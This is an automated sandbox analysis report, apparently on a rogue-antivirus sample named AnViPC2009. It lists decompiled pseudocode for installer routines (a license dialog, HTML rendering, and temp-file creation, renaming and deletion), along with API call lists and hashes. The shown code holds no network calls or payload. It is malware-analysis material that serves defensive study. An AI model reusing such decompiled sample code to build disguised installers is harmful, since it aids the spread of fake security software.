                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(?,?), ref: 00406864
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,-00000100), ref: 00406878
                                                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 00406893
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,-00000100,00000000,00000000,?,?,<html>,00000006,00000000,<html>), ref: 0040695B
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,000000FF,00000003,-00000100,00000000,00000000), ref: 00406979
                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,00000000,?,?,<html>,00000006,00000000,<html>), ref: 004069AD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AllocCreateStreamVersionlstrlen
                                                                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$about:blank$utf-8"></head>
                                                                                                                                                  • API String ID: 918982468-1117646011
                                                                                                                                                  • Opcode ID: 6613f05430d2be38eab970cdeecfdb6448cc8e06c40dab9692f363f45d80c02d
                                                                                                                                                  • Instruction ID: 592f9709469bb749250ec95068b8c0ac80250042cc6f7dfb8e9dec69e5aa2f7f
                                                                                                                                                  • Opcode Fuzzy Hash: 6613f05430d2be38eab970cdeecfdb6448cc8e06c40dab9692f363f45d80c02d
                                                                                                                                                  • Instruction Fuzzy Hash: CF51D672504348AFDF21AF74CC84DAE7BA9AF06304F15413AF95AA72D2C678CC24C729
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BA0F(void* __edx, void* __eflags, signed int _a4) {
                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void _v32;
                                                                                                                                                  				char _v1056;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				struct HWND__* _t15;
                                                                                                                                                  				int _t25;
                                                                                                                                                  				struct HWND__* _t35;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  
                                                                                                                                                  				_t14 = E0040AD00(__eflags);
                                                                                                                                                  				if(_t14 == 0) {
                                                                                                                                                  					return _t14;
                                                                                                                                                  				}
                                                                                                                                                  				_t15 = GetWindow(_a4, 5);
                                                                                                                                                  				_a4 = _a4 & 0x00000000;
                                                                                                                                                  				_t35 = _t15;
                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                  					L12:
                                                                                                                                                  					return _t15;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(_a4 < 0x200) {
                                                                                                                                                  						GetClassNameA(_t35,  &_v1056, 0x400);
                                                                                                                                                  						if(E0040DAE4( &_v1056, "STATIC") == 0 && (GetWindowLongA(_t35, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                                                                                  							_t39 = SendMessageA(_t35, 0x173, 0, 0);
                                                                                                                                                  							if(_t39 != 0) {
                                                                                                                                                  								GetObjectA(_t39, 0x18,  &_v32);
                                                                                                                                                  								_t25 = E0040ACBD(_v24);
                                                                                                                                                  								SendMessageA(_t35, 0x172, 0, E0040ABB5(_t39, E0040AC7A(_v28), _t25));
                                                                                                                                                  								_t47 = _t39 -  *0x4192d0; // 0xb6050a85
                                                                                                                                                  								if(_t47 != 0) {
                                                                                                                                                  									DeleteObject(_t39);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t15 = GetWindow(_t35, 2);
                                                                                                                                                  						_t35 = _t15;
                                                                                                                                                  						if(_t35 != _v8) {
                                                                                                                                                  							_a4 =  &(_a4->i);
                                                                                                                                                  							if(_t35 != 0) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x0040ba18
                                                                                                                                                  0x0040ba1f
                                                                                                                                                  0x0040baff
                                                                                                                                                  0x0040baff
                                                                                                                                                  0x0040ba2b
                                                                                                                                                  0x0040ba31
                                                                                                                                                  0x0040ba35
                                                                                                                                                  0x0040ba37
                                                                                                                                                  0x0040ba3c
                                                                                                                                                  0x0040bafd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba42
                                                                                                                                                  0x0040ba4a
                                                                                                                                                  0x0040ba64
                                                                                                                                                  0x0040ba7d
                                                                                                                                                  0x0040ba9b
                                                                                                                                                  0x0040ba9f
                                                                                                                                                  0x0040baa8
                                                                                                                                                  0x0040bab1
                                                                                                                                                  0x0040bacf
                                                                                                                                                  0x0040bad1
                                                                                                                                                  0x0040bad7
                                                                                                                                                  0x0040bada
                                                                                                                                                  0x0040bada
                                                                                                                                                  0x0040bad7
                                                                                                                                                  0x0040ba9f
                                                                                                                                                  0x0040bae3
                                                                                                                                                  0x0040bae9
                                                                                                                                                  0x0040baee
                                                                                                                                                  0x0040baf0
                                                                                                                                                  0x0040baf5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040baf5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040baee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bafc

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 0040BA2B
                                                                                                                                                  • GetClassNameA.USER32(00000000,?,00000400), ref: 0040BA64
                                                                                                                                                    • Part of subcall function 0040DAE4: CompareStringA.KERNEL32(00000400,00001001,0040BA7B,000000FF,?,000000FF,0040BA7B,?,STATIC), ref: 0040DAFA
                                                                                                                                                  • GetWindowLongA.USER32 ref: 0040BA82
                                                                                                                                                  • SendMessageA.USER32(00000000,00000173,00000000,00000000), ref: 0040BA99
                                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0040BAA8
                                                                                                                                                    • Part of subcall function 0040ACBD: GetDC.USER32(00000000), ref: 0040ACC9
                                                                                                                                                    • Part of subcall function 0040ACBD: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040ACD8
                                                                                                                                                    • Part of subcall function 0040ACBD: ReleaseDC.USER32 ref: 0040ACE6
                                                                                                                                                    • Part of subcall function 0040AC7A: GetDC.USER32(00000000), ref: 0040AC86
                                                                                                                                                    • Part of subcall function 0040AC7A: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040AC95
                                                                                                                                                    • Part of subcall function 0040AC7A: ReleaseDC.USER32 ref: 0040ACA3
                                                                                                                                                    • Part of subcall function 0040ABB5: GetDC.USER32(00000000), ref: 0040ABC1
                                                                                                                                                    • Part of subcall function 0040ABB5: CreateCompatibleDC.GDI32(00000000), ref: 0040ABD1
                                                                                                                                                    • Part of subcall function 0040ABB5: CreateCompatibleDC.GDI32(?), ref: 0040ABD8
                                                                                                                                                    • Part of subcall function 0040ABB5: GetObjectA.GDI32(?,00000018,?), ref: 0040ABE6
                                                                                                                                                    • Part of subcall function 0040ABB5: CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC08
                                                                                                                                                    • Part of subcall function 0040ABB5: SelectObject.GDI32(00000000,?), ref: 0040AC1B
                                                                                                                                                    • Part of subcall function 0040ABB5: SelectObject.GDI32(?,00000000), ref: 0040AC26
                                                                                                                                                    • Part of subcall function 0040ABB5: StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC44
                                                                                                                                                    • Part of subcall function 0040ABB5: SelectObject.GDI32(00000000,?), ref: 0040AC4E
                                                                                                                                                    • Part of subcall function 0040ABB5: SelectObject.GDI32(?,?), ref: 0040AC56
                                                                                                                                                    • Part of subcall function 0040ABB5: DeleteDC.GDI32(00000000), ref: 0040AC5F
                                                                                                                                                    • Part of subcall function 0040ABB5: DeleteDC.GDI32(?), ref: 0040AC64
                                                                                                                                                    • Part of subcall function 0040ABB5: ReleaseDC.USER32 ref: 0040AC6A
                                                                                                                                                  • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BACF
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040BADA
                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040BAE3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$Select$CompatibleCreateDeleteReleaseWindow$CapsDeviceMessageSend$BitmapClassCompareLongNameStretchString
                                                                                                                                                  • String ID: STATIC
                                                                                                                                                  • API String ID: 1367540300-1882779555
                                                                                                                                                  • Opcode ID: 268420487594ce6d88ac75f857c0ede5cd477e1dda5cee96e764faf45609b51d
                                                                                                                                                  • Instruction ID: 34654543d9d21e434690d81d6379bc3700808d3ca93a5599166f59ff111890e6
                                                                                                                                                  • Opcode Fuzzy Hash: 268420487594ce6d88ac75f857c0ede5cd477e1dda5cee96e764faf45609b51d
                                                                                                                                                  • Instruction Fuzzy Hash: D6210432240209BBDB229B60CD46FEF7678EB44740F108036FA01B61D0DBB899529AAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040CB0C(void* __ecx, void* __edx, void* __esi, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				long _t11;
                                                                                                                                                  				long _t18;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				struct HWND__* _t32;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				struct HWND__* _t36;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_t35 = __edx;
                                                                                                                                                  				_t36 = _a4;
                                                                                                                                                  				E00403059(__edx, _t36, _a8, _a12, _a16, "LICENSEDLG", 0, 0);
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					_t10 =  *0x4192d4; // 0x203fd
                                                                                                                                                  					_t38 = SendMessageA;
                                                                                                                                                  					__eflags = _t10;
                                                                                                                                                  					if(_t10 != 0) {
                                                                                                                                                  						SendMessageA(_t36, 0x80, 1, _t10);
                                                                                                                                                  					}
                                                                                                                                                  					_t11 =  *0x4192d0; // 0xb6050a85
                                                                                                                                                  					__eflags = _t11;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						SendDlgItemMessageA(_t36, 0x66, 0x172, 0, _t11);
                                                                                                                                                  					}
                                                                                                                                                  					E0040BA0F(_t35, __eflags, _t36);
                                                                                                                                                  					_t32 = GetDlgItem(_t36, 0x65);
                                                                                                                                                  					SendMessageA(_t32, 0x435, 0, 0x10000);
                                                                                                                                                  					SendMessageA(_t32, 0x443, 0, GetSysColor(0xf));
                                                                                                                                                  					E0040BF72(_t35, _t38, _t36,  *0x41a818, 3);
                                                                                                                                                  					_t18 =  *0x41a820;
                                                                                                                                                  					__eflags = _t18;
                                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_push(1);
                                                                                                                                                  						L13:
                                                                                                                                                  						EndDialog(_t36, ??);
                                                                                                                                                  						goto L14;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t34 =  *0x418ec8; // 0x0
                                                                                                                                                  						E00406D16(_t34,  *0x414c74, _t32, _t18);
                                                                                                                                                  						E0040A1DE( *0x41a820);
                                                                                                                                                  						L14:
                                                                                                                                                  						__eflags = 1;
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t29 == 0) {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t29 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}












                                                                                                                                                  0x0040cb0c
                                                                                                                                                  0x0040cb11
                                                                                                                                                  0x0040cb27
                                                                                                                                                  0x0040cb2f
                                                                                                                                                  0x0040cb34
                                                                                                                                                  0x0040cb54
                                                                                                                                                  0x0040cb5a
                                                                                                                                                  0x0040cb60
                                                                                                                                                  0x0040cb62
                                                                                                                                                  0x0040cb6d
                                                                                                                                                  0x0040cb6d
                                                                                                                                                  0x0040cb6f
                                                                                                                                                  0x0040cb74
                                                                                                                                                  0x0040cb76
                                                                                                                                                  0x0040cb82
                                                                                                                                                  0x0040cb82
                                                                                                                                                  0x0040cb89
                                                                                                                                                  0x0040cb9e
                                                                                                                                                  0x0040cba6
                                                                                                                                                  0x0040cbb9
                                                                                                                                                  0x0040cbc4
                                                                                                                                                  0x0040cbc9
                                                                                                                                                  0x0040cbcf
                                                                                                                                                  0x0040cbd1
                                                                                                                                                  0x0040cbf3
                                                                                                                                                  0x0040cbf3
                                                                                                                                                  0x0040cbf5
                                                                                                                                                  0x0040cbf6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cbd3
                                                                                                                                                  0x0040cbd3
                                                                                                                                                  0x0040cbe1
                                                                                                                                                  0x0040cbec
                                                                                                                                                  0x0040cbfc
                                                                                                                                                  0x0040cbfe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cbfe
                                                                                                                                                  0x0040cbd1
                                                                                                                                                  0x0040cb37
                                                                                                                                                  0x0040cb47
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb47
                                                                                                                                                  0x0040cb3d
                                                                                                                                                  0x0040cb3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb45
                                                                                                                                                  0x0040cb4e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb4e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageA.USER32(?,00000080,00000001,000203FD), ref: 0040CB6D
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000172,00000000,B6050A85), ref: 0040CB82
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040CB91
                                                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00010000), ref: 0040CBA6
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040CBAA
                                                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,00000000), ref: 0040CBB9
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040CBF6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Item$ColorDialog
                                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                                  • API String ID: 1567230415-2177901306
                                                                                                                                                  • Opcode ID: 024860b8d448d8573bbdeca29b64f752bb975fd9adc44ee1d7b468c070fba27b
                                                                                                                                                  • Instruction ID: c28829b0c4744746a20f643c9fd0defff009b081001e5734792abdb12e0319b8
                                                                                                                                                  • Opcode Fuzzy Hash: 024860b8d448d8573bbdeca29b64f752bb975fd9adc44ee1d7b468c070fba27b
                                                                                                                                                  • Instruction Fuzzy Hash: 4D21A131240209FAE6216F64ACC6FBB36BDE705B44F008036F600F91E0CAB99C52A76D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E00406675(intOrPtr __ecx) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				short _v32;
                                                                                                                                                  				struct tagMSG _v60;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  				short _t28;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  
                                                                                                                                                  				_v12 = __ecx;
                                                                                                                                                  				_v8 = GetTickCount();
                                                                                                                                                  				_t23 = GetTickCount() - _v8;
                                                                                                                                                  				while(_t23 <= 0x2710) {
                                                                                                                                                  					_t25 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                  					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                                                                                  					if(_v16 != 4) {
                                                                                                                                                  						if(PeekMessageA( &_v60, 0, 0, 0, 0) != 0) {
                                                                                                                                                  							TranslateMessage( &_v60);
                                                                                                                                                  							DispatchMessageA( &_v60);
                                                                                                                                                  							GetMessageA( &_v60, 0, 0, 0);
                                                                                                                                                  						}
                                                                                                                                                  						_t23 = GetTickCount() - _v8;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				__imp__#8( &_v32);
                                                                                                                                                  				_t28 = 3;
                                                                                                                                                  				_v32 = _t28;
                                                                                                                                                  				_t30 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                  				_v24 = 0x96;
                                                                                                                                                  				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                                                                                  			}













                                                                                                                                                  0x00406684
                                                                                                                                                  0x00406689
                                                                                                                                                  0x0040668e
                                                                                                                                                  0x004066eb
                                                                                                                                                  0x0040669d
                                                                                                                                                  0x004066a7
                                                                                                                                                  0x004066b1
                                                                                                                                                  0x004066c3
                                                                                                                                                  0x004066c9
                                                                                                                                                  0x004066d3
                                                                                                                                                  0x004066e0
                                                                                                                                                  0x004066e0
                                                                                                                                                  0x004066e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004066e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004066b1
                                                                                                                                                  0x004066f3
                                                                                                                                                  0x004066fb
                                                                                                                                                  0x00406701
                                                                                                                                                  0x00406708
                                                                                                                                                  0x0040670f
                                                                                                                                                  0x00406723

                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00406687
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040668C
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004066BB
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 004066C9
                                                                                                                                                  • DispatchMessageA.USER32 ref: 004066D3
                                                                                                                                                  • GetMessageA.USER32 ref: 004066E0
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004066E6
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004066F3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4242828014-0
                                                                                                                                                  • Opcode ID: 1eccd4a20faceeccb654432c3d422e89937423dbc43f928823b2826d10039a86
                                                                                                                                                  • Instruction ID: e0ae3d4bd60ead943df741a1fb770118881d01034fcd83090d0ffaa80e49bef7
                                                                                                                                                  • Opcode Fuzzy Hash: 1eccd4a20faceeccb654432c3d422e89937423dbc43f928823b2826d10039a86
                                                                                                                                                  • Instruction Fuzzy Hash: 1E210B71D00209AFDB00DBE4DD88DDEBBBCEF48315F108866F506E7160D6759A55CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0040C59B(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                  				void* _t230;
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				void* _t307;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					_t307 = __esi;
                                                                                                                                                  					if( *((intOrPtr*)(_t309 + 0x10)) != 1) {
                                                                                                                                                  						goto L103;
                                                                                                                                                  					}
                                                                                                                                                  					L88:
                                                                                                                                                  					__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                  					__ebp - 0xc34 = E004076A1(__ebp - 0xc34);
                                                                                                                                                  					 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                  					_push(0);
                                                                                                                                                  					__ebx = "%s%s%d";
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L90:
                                                                                                                                                  						__eax = __ebp - 0xc34;
                                                                                                                                                  						__eax = __ebp - 0x834;
                                                                                                                                                  						__eax =  *__edi(__ebp - 0x834, __ebx, __ebp - 0xc34,  *0x41409c);
                                                                                                                                                  						__esp = __esp + 0x14;
                                                                                                                                                  						__eax = __ebp - 0x834;
                                                                                                                                                  						__eax = __esi->i(__ebp - 0x834);
                                                                                                                                                  						if(__eax == 0xffffffff) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L89:
                                                                                                                                                  						_t127 = __ebp - 4;
                                                                                                                                                  						 *_t127 =  *(__ebp - 4) + 1;
                                                                                                                                                  						_push( *(__ebp - 4));
                                                                                                                                                  					}
                                                                                                                                                  					L91:
                                                                                                                                                  					__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                  					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L152:
                                                                                                                                                  							_t230 = _t309 - 0x54dc;
                                                                                                                                                  							_t231 = E0040B5EC(0x1000, _t307);
                                                                                                                                                  							 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                  							asm("ror byte [edi], 0x85");
                                                                                                                                                  							[far dword [esi+0x5b]( *((intOrPtr*)(_t309 + 0xc)), _t230, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                  							_t307 = GetFileAttributesA;
                                                                                                                                                  							_t232 = _t309 - 0x1c34;
                                                                                                                                                  							 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                  							 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                  							goto L2;
                                                                                                                                                  							L4:
                                                                                                                                                  							while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                  								 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                  								if( *(_t309 - 4) < 0xd) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L152;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							if( *(_t309 - 4) > 0xc) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							L8:
                                                                                                                                                  							switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA42))) {
                                                                                                                                                  								case 0:
                                                                                                                                                  									L9:
                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                  									if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L10:
                                                                                                                                                  									GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                  									E0040A450(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                  									E004076A1(_t309 - 0xc34);
                                                                                                                                                  									E0040A5BB(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                  									E00405B6F(_t309 - 0x40dc);
                                                                                                                                                  									E00405B9F(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                  									E00403517(_t309 - 0x30d4);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t301 = _t309 - 0x40dc;
                                                                                                                                                  									_t252 = E00405F6F(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                  									__eflags = _t252;
                                                                                                                                                  									if(_t252 == 0) {
                                                                                                                                                  										L27:
                                                                                                                                                  										E00405B8C(_t309 - 0x40dc);
                                                                                                                                                  										goto L152;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t295 = "%s.%d.tmp";
                                                                                                                                                  										do {
                                                                                                                                                  											L12:
                                                                                                                                                  											SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                  											__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                  											if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                  												L18:
                                                                                                                                                  												_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                  												__eflags = _t257 - 0xffffffff;
                                                                                                                                                  												if(_t257 == 0xffffffff) {
                                                                                                                                                  													goto L26;
                                                                                                                                                  												}
                                                                                                                                                  												L19:
                                                                                                                                                  												_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                  												__eflags = _t261;
                                                                                                                                                  												if(_t261 != 0) {
                                                                                                                                                  													goto L26;
                                                                                                                                                  												} else {
                                                                                                                                                  													 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                  													_push(_t261);
                                                                                                                                                  													goto L22;
                                                                                                                                                  													L22:
                                                                                                                                                  													wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                  													_t311 = _t311 + 0x10;
                                                                                                                                                  													_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                  													__eflags = _t266 - 0xffffffff;
                                                                                                                                                  													if(_t266 != 0xffffffff) {
                                                                                                                                                  														_t60 = _t309 - 4;
                                                                                                                                                  														 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                  														__eflags =  *_t60;
                                                                                                                                                  														_push( *(_t309 - 4));
                                                                                                                                                  														goto L22;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
